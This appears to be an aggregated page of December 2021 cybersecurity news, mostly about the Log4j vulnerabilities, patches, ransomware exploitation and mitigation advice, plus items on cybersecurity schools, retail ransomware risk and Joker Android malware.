Information Technology

Apache has released version 2.17.0 of the patch for Log4j after discovering issues with their previous release, which came out on Tuesday. Apache said version 2.16 “does not always protect from infinite recursion in lookup evaluation” and explained that it is vulnerable to CVE-2021-45105, a denial of service vulnerability. They said the severity is “high” and gave it a CVSS score of 7.5.”Apache Log4j2 versions 2.0-alpha1 through 2.16.0 did not protect from uncontrolled recursion from self-referential lookups. When the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, $${ctx:loginId}), attackers with control over Thread Context Map (MDC) input data can craft malicious input data that contains a recursive lookup, resulting in a StackOverflowError that will terminate the process. This is also known as a DOS (Denial of Service) attack,” Apache explained. They added that the latest issue was discovered by Akamai Technologies’ Hideki Okamoto and an anonymous vulnerability researcher.Mitigations include applying the 2.17.0 patch and replacing Context Lookups like ${ctx:loginId} or $${ctx:loginId} with Thread Context Map patterns (%X, %mdc, or %MDC) in PatternLayout in the logging configuration. Apache also suggested removing references to Context Lookups in the the configuration like ${ctx:loginId} or $${ctx:loginId} where they originate from sources external to the application such as HTTP headers or user input.They noted that only the Log4j-core JAR file is impacted by CVE-2021-45105. On Friday, security researchers online began tweeting about potential issues with 2.16.0, with some identifying the denial of service vulnerability. 

Discussion about Log4j has dominated conversation all week. CISA released multiple advisories mandating federal civilian agencies in the US apply patches before Christmas while several major tech companies like IBM, Cisco and VMware have raced to address Log4j vulnerabilities in their products. Security company Blumira claims to have found a new Log4j attack vector that can be exploited through the path of a listening server on a machine or local network, potentially putting an end to the assumption that the problem was limited to exposed vulnerable servers.Other cybersecurity firms have found that major ransomware groups like Conti are exploring ways to take advantage of the vulnerability. Google released a security report on Friday where Open Source Insights Team members James Wetter and Nicky Ringland said they found that 35,863 of the available Java artifacts from Maven Central depend on the affected Log4j code. This means that more than 8% of all packages on Maven Central have at least one version that is impacted by this vulnerability, the two explained. “The average ecosystem impact of advisories affecting Maven Central is 2%, with the median less than 0.1%,” Wetter and Ringland said. So far, nearly 5,000 artifacts have been patched, leaving more than 30,000 more. But the two noted that it will be difficult to address the issue because of how deep Log4j is embedded in some products. 
Google
“Most artifacts that depend on log4j do so indirectly. The deeper the vulnerability is in a dependency chain, the more steps are required for it to be fixed. For greater than 80% of the packages, the vulnerability is more than one level deep, with a majority affected five levels down (and some as many as nine levels down),” Wetter and Ringland wrote.”These packages will require fixes throughout all parts of the tree, starting from the deepest dependencies first.”The two went on to say that after looking at all publicly disclosed critical advisories affecting Maven packages, they found less than half (48%) of the artifacts affected by a vulnerability have been fixed, meaning it may take years for the Log4j issue to be solved. More

Are you a career-focused professional searching for the best cybersecurity programs? Discover several of the top colleges and universities with affordable tuition and impressive academic reputations.Consider college and program-specific grants, scholarships, and work-study jobs as well as education awards and other financial aid resources.When selecting the best programs, research each school’s accreditation, recruitment and enrollment efforts, and full-time and part-time graduation and retention rates, along with online degree options.
Best cybersecurity schools and programsThe data for this list was collected from the Integrated Postsecondary Education Data System and College Scorecard datasets.While several schools achieved high rankings, the following list draws from a subset of top-rated, regionally accredited schools and historically Black colleges and universities. Rankings were based on many factors such as computer science scholarships, online cybersecurity degree options, and affordable tuition and fees.Several top-rated colleges and universities have been listed. The data is accurate as of time of publication. Prior to enrollment, prospective students are encouraged to check the school’s websites and terms and conditions.1.  Bentley University

Bentley University’s cybersecurity risk management certificate offers students and working professionals experience in information security. Prospective students can earn a CompTIA, ISACA, Cloud Security Alliance, or (ISC)2 certification. Students pay $9,900 for the certificate program and prepare for certification exams. The university ranks first for career services and promotes diversity-related initiatives.2.  Bowie State UniversityBowie State University offers a graduate certificate, bachelor’s, and advanced computer science degrees with a cybersecurity specialization. Students may earn a computer technology bachelor’s degree in alpha and beta testing, cloud computing, and other related specializations. The university is recognized as a National Center of Academic Excellence in Cyber Defense Education and a top five institution for African American technology graduates.
3.  Butler UniversityButler University offers students and working professionals a four-module cyber risk management certificate. This self-paced program is $1,995 and may be completed in 3 to 10 hours. Students will gain program-specific experience in understanding pure risk and cyber risk, identifying third party errors and omissions, and interpreting cyber risk insurance policies along with other relevant industry skills.4. Carroll CollegeCarroll College offers a free, online three-stage cyber fast track program in cybersecurity in which students gain in-depth, foundational knowledge of cybersecurity. Once mastered, students proceed with master forensics, intrusion detection, and security operations along with system and network penetration testing and application testing. The college awards three Women in Cybersecurity Scholarships to undergraduate and graduate students.5.  Champlain College OnlineChamplain College offers students an online cybersecurity bachelor’s degree. The program is 120 credit hours and entirely online. Students commit 10 to 17 hours of course study. The university is recognized as a National Center of Academic Excellence in Cyber Defense Education. The college has ranked among the most affordable online cybersecurity bachelor’s degrees.6.  Howard University Howard University offers a 15 credit hour cybersecurity graduate certificate. This program includes both computer science and engineering coursework. Students complete a year-long cybersecurity course, two technical courses, and a capstone project. Students may select database systems and security, wireless network security, or advanced operating systems and security to satisfy technical courses.7.  Kennesaw State UniversityKennesaw State University offers an online cybersecurity bachelor’s and master’s degree. The 30-credit cybersecurity master’s program can be completed within a year. This program is suitable for both career changers and working professionals seeking career advancement. In 2019, the university ranked in the top 50 and 60 for business and information technology and engineering.8.  North Carolina A&T State UniversityNorth Carolina A&T offers an online, 12-credit hour post-baccalaureate cybersecurity certificate. Prospective students are required to take information privacy and security or advanced security applications along with a computer system security or network security course. For technical courses, students may choose from software security testing, principles of computer networking, and related computer science and technology courses.9. University of Illinois at Urbana-ChampaignThe University of Illinois at Urbana-Champaign offers a three course certificate in cybersecurity. Prospective students may compete in an approved cybersecurity competition, serve as an undergraduate researcher, or participate in the Illinois Cyber Security Scholars Program to meet the extracurricular requirement. While completing the certificate program, students attend an Information Trust Institute certificate program meeting.10.  Virginia TechVirginia Tech offers an online, 12-week cyber bootcamp. Prospective students may enroll in the computer engineering bachelor’s program with a cyber operations track, cybersecurity management and analytics business degree, or computer engineering major in networks and cybersecurity program. The university offers a Cybercorps Scholarship for Service and master’s programs with cybersecurity tracks.  More

Researchers with security firm Advanced Intelligence have discovered the Conti ransomware group exploiting VMware vCenter Server instances through the Log4j vulnerabilities. In a report on Friday, the security company said it discovered multiple members of Conti discussing ways to take advantage of the Log4j issue, making them the first sophisticated ransomware group spotted trying to weaponize the vulnerability. AdvIntel said the current exploitation “led to multiple use cases through which the Conti group tested the possibilities of utilizing the Log4J2 exploit.” “Most importantly, AdvIntel confirmed that the criminals pursued targeting specific vulnerable Log4J2 VMware vCenter for lateral movement directly from the compromised network resulting in vCenter access affecting US and European victim networks from the pre-existent Cobalt Strike sessions,” the researchers said. They noted that their research of ransomware logs shows Conti made over $150 million in the last six months. AdvIntel laid out a timeline of events for Conti’s interest in Log4j starting on November 1, when the group sought to find new attack vectors. Throughout November, Conti redesigned its infrastructure as it sought to expand and by December 12, they identified Log4Shell as a possibility. By December 15, they began actively targeting vCenter networks for lateral movement. 
Advanced Intelligence
In a statement, VMware said it issued a security advisory containing fixes for the 40 products it sells that are vulnerable to the Log4J issue, including vCenter. In the advisory they confirm that exploitation attempts in the wild have been confirmed. 

“Any service connected to the internet and not yet patched for the Log4j vulnerability (CVE-2021-44228) is vulnerable to hackers, and VMware strongly recommends immediate patching for Log4j,” VMware said.AdvIntel added that it is only a matter of time until Conti and other groups will begin exploiting Log4j to its full capacity. Khonsari was the first ransomware group to begin targeting Log4j but was considered lower grade and did not even have a viable ransom note, leading some to consider it simply a wiper. Researchers in China have identified the TellYouThePass ransomware being used in attacks against Windows and Linux devices using the Log4j issue. Recorded Future ransomware expert Allan Liska said the most recent news about different ransomware groups exploring exploitation of Log4j lined up with what he is seeing.”IABs working with Conti have started scanning for Log4Shell and likely have exploited victims. BUT we have not seen any evidence of a successful ransomware attack resulting from these scans yet. Doesn’t mean it hasn’t happened, just we haven’t seen it,” Liska said.  More

US online holiday sales grew by 30% in 2020, and Forrester forecasts that it will grow another 10% year over year in 2021. This growth raises the stakes for retail professionals to support the increased demand, which ultimately makes them a prime target for ransomware attackers. Why should retailers pay attention to ransomware preparedness? Ransomware attackers target organizations that need as close to 100% uptime as possible, since those businesses will feel the effects of a ransomware attack more viscerally and are more likely to pay a ransom quickly. Retailers and their providers fall right into this bucket: They rely on continuously running production, they must serve consumers constantly, and they often utilize just-in-time manufacturing. Furthermore, they often have several third-party dependencies they can’t disappoint and complex supply chains to manage. Every aspect of the retail supply chain is a potential target of attack. Since the holiday season guarantees retailers an increase in traffic and more emotionally-charged purchases, the incentive for ransomware groups to attack them is exacerbated now more than ever. Below, we provide a primer on ransomware attacks and how they can affect retailers. What is ransomware? Ransomware is a type of malicious software designed to block access to a computer system until a sum of money is paid. It’s been used in very public attacks, like the one on Colonial Pipeline earlier this year, and attacks on hospital systems. This type of attack has become more common in part because of the emergence of ransomware-as-a-service (RaaS). RaaS is where attackers sell access to ransomware software as though they were operating a business, fully outfitted with salespeople, developers, managers, and marketers. They operate as a typical startup and sell access to their “product” on the dark web to cybercriminals who do not want to develop their own ransomware but still want to use it and get the payout. How does ransomware affect retailers? Ransomware attacks affect every aspect of the retail supply chain, especially in these five areas: suppliers, logistics, operations, products, and websites. Below are descriptions of how ransomware can affect each of these and real-world examples. 

Suppliers When ransomware attackers target suppliers, it often results in machines in factories being disabled or employees being locked out of critical supply systems. Once most suppliers discover a ransomware attack, the de facto response to contain the attack is to shut down facility operations indefinitely. This results in production bottlenecks, and customers scramble to use their alternative supplier. This kind of attack struck JBS Foods this year, shutting down its slaughterhouse for an entire day. To add insult to injury, JBS had to shell out $11 million in Bitcoin ransom to get its systems back. To gauge the resilience of your suppliers in a crisis, we recommend using The Forrester Supplier Resilience Assessment Tool. Logistics Logistics firms are targeted by ransomware groups because of their just-in-time business models and the complex interconnectedness of their IT systems. Ransomware attacks on these targets quickly infect computer systems throughout the network to encrypt as many devices as possible and render the firm inoperable. This happened over the past few years with CMA CGM, FedEx, and Maersk, which all halted operations and suffered millions in revenue loss. Operations When ransomware infiltrates a brick-and-mortar store, it tries to infect point-of-sale systems, employee tools, store printers — whatever it can get its hands on. These attacks can prevent customer transactions or even force stores to close. More detrimental for the brand is the risk that your customers will witness an attack unravel your operations in real time. For example, Cencosud was made aware of a ransomware attack hitting their systems when POS printers spewed out ransomware notes in its stores. Products Digital products such as e-readers, tablets, video gaming systems, and others are also susceptible to ransomware attacks. When hit, these devices may appear inoperable while the attacker steals company and customer data. This situation can be very detrimental for customers and organizations. When devices mysteriously stop working, customers often take to social media to air their grievances. This inevitably affects the external image of the brand and public perception of your product’s efficacy. When Barnes & Noble’s NOOK e-reader was attacked with ransomware, customers lost access to their libraries, purchases, and accounts — and complained on Facebook and Twitter as a result. Websites Ransomware attackers often look to target public assets — especially ones retailers rely on, like e-commerce websites. If your website shuts down from a ransomware attack, customers lose access to you, which may confuse or frustrate them and leave them concerned about the safety of their data. Last year, X-Cart’s e-commerce hosting site was corrupted, locking out store owners from their own websites and preventing customers from accessing them for days. How can you protect against ransomware attacks this holiday season? Protecting against ransomware attacks is something every single employee can participate in. Both during the holiday season and as you plan for your 2022 operations, the top three things we recommend to promote ransomware defenses among your employees are: Keep your team informed about the implications of a ransomware attack, especially around high-traffic times like the holidays. Make sure they know what ransomware is and are on the lookout for any signs of a potential ransomware attack. Get your employees to gamify finding phishing attacks and reporting them to your security team. Phishing attacks are one of the main ways cybercriminals start their attacks, so the more awareness you can spread about this attack vector, the better. Work with the security team to simulate what you would do in the event of a ransomware attack. Having a plan in place for how to respond when a ransomware attack happens is critical to having a quick and complete recovery. This blog post is part of Forrester’s holiday 2021 series, read more here.This post was written by Analyst Allie Mellen and it originally appeared here. More

It doesn’t rain, but it pours. Previously, one assumption about the 10 out of 10 Log4j security vulnerability was that it was limited to exposed vulnerable servers. We were wrong. The security company Blumira claims to have found a new, exciting Log4j attack vector.

more coverage

You didn’t really want to take this weekend off, did you? Of course not! Instead, you’ll be chasing down vulnerable Log4j code ever deeper into your network. According to Blumira, this newly-discovered Javascript WebSocket attack vector can be exploited through the path of a listening server on their machine or local network. An attacker can simply navigate to a website and trigger the vulnerability. Adding insult to injury, WebSocket connections within the host can be difficult to gain deep visibility into. That means it’s even harder to detect this vulnerability and attacks using it.This vector significantly expands the attack surface. How much so? It can be used on services running as localhost, which are not exposed to a network. This is what we like to call a “Shoot me now” kind of problem. Oh, and did I mention? The client itself has no direct control over WebSocket connections. They can silently start when a webpage loads. Don’t you love the word “silently” in this context? I know I do. WebSockets, for those of you who aren’t web developers, are in almost all modern web browsers. They’re commonly used for two-way communication functions such as website chat and alerts. They’re great at passing timely information back to the browser and allowing the browser to quickly send data back and forth. However, WebSockets have their own security risks. WebSockets aren’t restricted by same-origin policies like a normal cross-domain HTTP request. Instead,  they expect the webserver to validate a request’s origin. In short, they don’t come with much in the way of built-in security measures.As you’d guess from this, WebSockets have been used in attacks before. WebSockets have been used to attack cable modems by sending malicious requests. It’s also used by hackers for host fingerprinting and port scanning.

In their proof-of-concept attack, Blumira found that by using one of the many Java Naming and Directory Interface (JNDI) exploits that they could trigger via a file path URL using a WebSocket connection to machines with an installed vulnerable Log4j2 library. All that was needed to trigger success was a path request that was started on the web page load. Simple, but deadly. Making matters worse, it doesn’t need to be localhost. WebSockets allow for connections to any IP. Let me repeat, “Any IP” and that includes private IP space.Next, as the page loads, it will initiate a local WebSocket connection, hit the vulnerable listening server, and connect out over the identified type of connection based on the JNDI connection string. The researchers saw the most success utilizing Java Remote Method Invocation (RMI). default port 1099., although we are often seeing custom ports used. Simply port scanning, a technique already in the WebSocket hacker handbook,  was the easiest path to a successful attack. Making detecting such attacks even harder, the company found “specific patterns should not be expected as it is easy to trigger traffic passively in the background.”Then, an open port to a local service or a service accessible to the host is found, it can then drop the JNDI exploit string in path or parameters. “When this happens, the vulnerable host calls out to the exploit server, loads the attacker’s class, and executes it with java.exe as the parent process.” Then the attacker can run whatever he wants. Indeed, they already are. As Anurag Gurtu, StrikeReady’s chief product officer, observed, “Apparently, a ransomware attack is currently exploiting the Log4Shell vulnerability. It’s the Khonsari ransomware gang that has built an attack using C# and the .NET framework. After execution, the malware enumerates all mounted drives (other than C:/) and targets user directories including Documents, Videos, Pictures, Downloads, and Desktop. An AES 128 CBC algorithm is used for encryption, and the files are saved with a .khonsari extension.”They’re not the only ones. State-sponsored hackers from China, Iran, North Korea, and Turkey; Cobalt Strike; and many others are also exploiting Log4j vulnerabilities. This latest vulnerability simply opens the doors even wider for would-be attackers. It will only get worst before it gets better For as Sophos senior threat researcher Sean Gallagher recently explained to date, Log4Shell attackers have been focused on cryptomining, but this is just a “lull before the storm.”He continued, “We expect adversaries are likely grabbing as much access to whatever they can get right now… to monetize and/or capitalize on it later on. The most immediate priority for defenders is to reduce exposure by patching and mitigating all corners of their infrastructure and investigate exposed and potentially compromised systems.” After all, Gallagher concluded, “This vulnerability can be everywhere.”What can you do about this? Blumira suggests the following:Update all local development efforts, internal applications, and internet-facing environments to Log4j 2.16 as soon as possible, before threat actors can weaponize this exploit further. This includes moving any custom applications in their dependency manifests to 2.16 as soon as possible to avoid incidental exploitation. You should also look closely at your network firewall and egress filtering. The mission here is to restrict the callback required for the actual exploit to land. Significantly limiting the egress traffic of your endpoints will reduce the risk as you patch your applications. In particular, make sure that only certain machines can send out traffic over 53, 389, 636, and 1099 ports.  All other ports should be blocked. Finally, since weaponized Log4j applications often attempt to call back home to their masters over random high ports, you should block their access to such ports. Good luck, get back to work hunting down Log4j libraries and calls and hope that you get as much of your infrastructure as you can batten down before the holidays. Related stories: More

The Cybersecurity and Infrastructure Security Agency (CISA) sent out an emergency directive on Friday, requiring federal civilian departments and agencies to immediately patch their internet-facing network assets for the Apache Log4j vulnerabilities. If they can’t patch, they’re required implement other appropriate mitigation measures.  CISA previously said federal civilian agencies would have until December 24 to address the issue, but it noted that the latest directive “is in response to the active exploitation by multiple threat actors of vulnerabilities found in the widely used Java-based logging package Log4j.”

more coverage

CISA Director Jen Easterly said they are urging organizations of all sizes to also assess their network security and adapt the mitigation measures outlined in the emergency directive.  If you are using a vulnerable product on your network, Easterly said you should consider your door wide open to any number of threats.  “The Log4j vulnerabilities pose an unacceptable risk to federal network security,” Easterly explained. ”CISA has issued this emergency directive to drive federal civilian agencies to take action now to protect their networks, focusing first on internet-facing devices that pose the greatest immediate risk.” According to CISA, the directive was handed down because these vulnerabilities are currently being exploited by threat actors. CISA’s investigations showed just how prevalent the affected software is in the federal enterprise.  CISA said there is a “high potential” for a compromise of agency information systems and expressed concern about the impact of a breach. 

VMware head of cybersecurity strategy Tom Kellermann said the exploitation of the Log4j vulnerability allows for full control of the target system that is running Apache.  “So they have the capacity to just be on missions and spy on the activities of the users of the systems. They have the capacity to use that system to island-hop into other systems. They have the capacity to become disruptive. It really varies,” said Kellermann, who served as a cybersecurity commissioner for the Obama administration. “I would say that there is so much activity going on right now, that it’ll probably weeks, if not months, before the true scope of this significant cybercrime wave for this vulnerability and the severity of its impact is discovered.” CISA created a dedicated webpage with Log4j mitigation guidance and resources for network defenders, as well as a community-sourced GitHub repository of affected devices and services.     CISA added the Log4j vulnerability, alongside 12 others, to its Known Exploited Vulnerabilities Catalog. It created the list last month as a way to provide government organizations with a catalog of vulnerabilities organized by severity. Using their honeypot network to attract attackers, cybersecurity firm Bitdefender found that their honeypots were attacked 36,000 times from Dec. 9 to Dec. 16. Half of all attacks used TOR to mask true country origin and were based on endpoint telemetry. The lead countries of origin for attacks were Germany at 34% and the US at 26%.  Bitdefender added that based on endpoint telemetry, the lead attack targets are the US at 48%, followed by the UK and Canada both at 8%. More

The remotely exploitable flaw in Log4j – the widely deployed Java error logging library — is being attacked by multiple actors and likely will remain so for many more months as open-source projects, product vendors, and end-user organisations patch affected systems. Google is now adding OSS-Fuzz to the pool of answers to the internet-wide Log4j flaw, also known as Log4Shell. The bug is tracked as CVE 2021-44228 and was partially fixed in Apache Foundation’s release of Log4j version 2.15.0 last week. OSS-Fuzz is Google’s free service for fuzzing open-source software projects and is currently used by over 500 critical projects. Fuzzing involves throwing random code at software to produce an error, like a crash, and uncover potential security flaws. LOG4J flaw coverage — What you need to know now:To seek out Log4Shell weaknesses in newly built open-source software, Google is partnering with security firm Code Intelligence to provide continuous fuzzing for Log4j. Code Intelligence makes Jazzer, an open-source fuzzing engine that’s now part of OSS-Fuzz, and has been modified to identify Log4j vulnerabilities in code in development. Google awarded Code Intelligence $25,000 for its work on the Log4j fuzzing.  “Since Jazzer is part of OSS-Fuzz, all integrated open-source projects written in Java and other JVM-based languages are now continuously searched for similar vulnerabilities,” Code Intelligence notes in a press release. Jazzer is also capable of detecting remote JNDI lookups — a strong sign that potential attackers are scanning a network for the flaw. 

JNDI (Java Naming and Directory Interface) is an interface for connecting to directories in Lightweight Directory Access Protocol (LDAP) servers, and the flaw in Log4j is found in its implementation of JNDI. As Cisco’s Talos researchers explain, the flaw allows a remote attacker to use a simple LDAP request to trigger the vulnerability in pre-2.15 versions of Log4j, then retrieve a payload from a remote server and execute it locally on a vulnerable device. Apache Foundation this week released Log4j version 2.16.0 to fix a second related flaw stemming from JNDI that’s being tracked as CVE 2021-45046. That flaw allowed an attacker to craft data patterns in a JNDI message lookup and cripple a machine with a denial of service (DoS). Log4j 2.16.0 disables access to JNDI by default and limits the default protocols to Java, LDAP and LDAPS. Disabling JNDI was previously a manual step to mitigate attacks against the original flaw. Most efforts are now focussed on vendors updating Log4j in their products and end-user organisations applying updates as they become available. For example, the US Cybersecurity and Infrastructure Security Agency (CISA) has given federal agencies until 24 December to identify all applications affected by Log4Shell. Cisco, VMware, IBM and Oracle are busy developing patches for their affected products. LOG4J flaw coverage — How to keep your company safe:  Google’s OSS-Fuzz tackles Log4j from another angle, aiming to prevent developers from accidentally inserting the flaw in new software projects that may eventually be deployed in production environments. “Vulnerabilities like Log4Shell are an eye-opener for the industry in terms of new attack vectors. With OSS-Fuzz and Jazzer, we can now detect this class of vulnerability so that they can be fixed before they become a problem in production code,” says Jonathan Metzman from the Google Open Source Security Team. More

Over half a million Android users have installed an app used to deliver Joker malware after downloading it from the Google Play store. Cybersecurity researchers at Pradeo identified the malware, which Google has now removed from its official Android app marketplace. Before its removal, the app, called ‘Color Message’, was downloaded by more than 500,000 Android users.

ZDNet Recommends

Advertised as an app that allowed users to personalise their default SMS messages, Color Message was a front to deliver Joker, one of the most prolific forms of Android malware. SEE: A winning strategy for cybersecurity (ZDNet special report)  Once installed, the malware does three things: it simulates clicks in order to generate revenue from malicious ads; subscribes users to unwanted paid premium services to steal money and commit billing fraud; and accesses users’ contact lists and sends the information to attackers. Researchers suggest there’s evidence that stolen information is sent to servers hosted in Russia. Negative reviews of the app on the Play Store suggest that some users have noticed the unauthorised behaviour, with complaints about being charged for services they didn’t request access to. Google Play has protocols designed to stop malicious apps from being published. However, the developers of the malicious app managed to bypass them.

“By using as little code as possible and thoroughly hiding it, Joker generates a very discreet footprint that can be tricky to detect,” said Pradeo’s Roxane Suau. Users who have downloaded Color Message from the Google Play Store have been urged to uninstall the app immediately. This is far from the first time Joker has been detected in the Play Store – Pradeo says it has been found in hundreds of apps in the past two years, but given how persistent those are behind it, it’s likely they’ll try to distribute the malware again. ZDNet has contacted Google for comment – a spokesperson confirmed that the malicious app has been removed from the Play Store.
MORE ON CYBERSECURITY More